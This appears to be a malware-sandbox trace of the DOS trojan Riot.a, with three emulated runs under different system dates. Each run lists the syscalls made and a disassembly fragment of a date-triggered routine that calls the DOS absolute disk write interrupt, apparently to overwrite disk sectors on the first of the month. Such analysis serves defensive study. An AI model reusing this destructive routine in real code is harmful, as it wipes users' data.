Sample viewer

vx.netlux.org/Trojan.DOS.Riot.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:14:32.504959829Z 51 PC: 12a5c | Get or set Ctrl-Break
2018-12-17T22:14:32.506568455Z 51 PC: 12a64 | Get or set Ctrl-Break
2018-12-17T22:14:32.507269022Z 53 PC: 12a69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:14:32.508407652Z 37 PC: 12a75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:14:32.510452918Z 26 PC: 12a7d | Set disk transfer address
2018-12-17T22:14:32.511558066Z 59 PC: 12a9f | Change current directory
2018-12-17T22:14:32.515659959Z 87 PC: 12aa6 | Get or set file date and time
2018-12-17T22:14:32.520811969Z 62 PC: 12aaa | Close file
2018-12-17T22:14:32.522647016Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dl, 1
0x12ab6: je 0x12abb
0x12ab8: jmp 0x12ad9
0x12aba: nop
0x12abb: cli
0x12abc: mov ah, 2
0x12abe: cdq
0x12abf: mov cx, 0x100
0x12ac2: int 0x26
0x12ac4: jmp 0x12ac7
0x12ac6: nop
0x12ac7: mov al, 3
0x12ac9: mov cx, 0x700
0x12acc: mov dx, 0
0x12acf: mov ds, word ptr [di + 0x99]
0x12ad3: mov bx, word ptr [di + 0x55]
0x12ad6: call 0x22abb
0x12ad9: mov dx, word ptr [bp + 0x1b9]
0x12add: mov ax, 0x4301
0x12ae0: int 0x21
2018-12-17T22:14:32.525093157Z 67 PC: 12ae2 | Get or set file attributes

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2734,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:20.908405546Z 51 PC: 12a5c | Get or set Ctrl-Break
2018-12-25T11:46:20.911431478Z 51 PC: 12a64 | Get or set Ctrl-Break
2018-12-25T11:46:20.912576424Z 53 PC: 12a69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:46:20.914136365Z 37 PC: 12a75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:46:20.916164426Z 26 PC: 12a7d | Set disk transfer address
2018-12-25T11:46:20.917636036Z 59 PC: 12a9f | Change current directory
2018-12-25T11:46:20.922290629Z 87 PC: 12aa6 | Get or set file date and time
2018-12-25T11:46:20.924327285Z 62 PC: 12aaa | Close file
2018-12-25T11:46:20.926036986Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dl, 1
0x12ab6: je 0x12abb
0x12ab8: jmp 0x12ad9
0x12aba: nop
0x12abb: cli
0x12abc: mov ah, 2
0x12abe: cdq
0x12abf: mov cx, 0x100
0x12ac2: int 0x26
0x12ac4: jmp 0x12ac7
0x12ac6: nop
0x12ac7: mov al, 3
0x12ac9: mov cx, 0x700
0x12acc: mov dx, 0
0x12acf: mov ds, word ptr [di + 0x99]
0x12ad3: mov bx, word ptr [di + 0x55]
0x12ad6: call 0x22abb
0x12ad9: mov dx, word ptr [bp + 0x1b9]
0x12add: mov ax, 0x4301
0x12ae0: int 0x21

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2734,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:06:47.990458292Z 51 PC: 12a5c | Get or set Ctrl-Break
2018-12-25T13:06:48.000288349Z 51 PC: 12a64 | Get or set Ctrl-Break
2018-12-25T13:06:48.001268907Z 53 PC: 12a69 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T13:06:48.002646252Z 37 PC: 12a75 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T13:06:48.0113104Z 26 PC: 12a7d | Set disk transfer address
2018-12-25T13:06:48.013556699Z 59 PC: 12a9f | Change current directory
2018-12-25T13:06:48.018933395Z 87 PC: 12aa6 | Get or set file date and time
2018-12-25T13:06:48.021303704Z 62 PC: 12aaa | Close file
2018-12-25T13:06:48.023290965Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dl, 1
0x12ab6: je 0x12abb
0x12ab8: jmp 0x12ad9
0x12aba: nop
0x12abb: cli
0x12abc: mov ah, 2
0x12abe: cdq
0x12abf: mov cx, 0x100
0x12ac2: int 0x26
0x12ac4: jmp 0x12ac7
0x12ac6: nop
0x12ac7: mov al, 3
0x12ac9: mov cx, 0x700
0x12acc: mov dx, 0
0x12acf: mov ds, word ptr [di + 0x99]
0x12ad3: mov bx, word ptr [di + 0x55]
0x12ad6: call 0x22abb
0x12ad9: mov dx, word ptr [bp + 0x1b9]
0x12add: mov ax, 0x4301
0x12ae0: int 0x21
2018-12-25T13:06:48.026125547Z 67 PC: 12ae2 | Get or set file attributes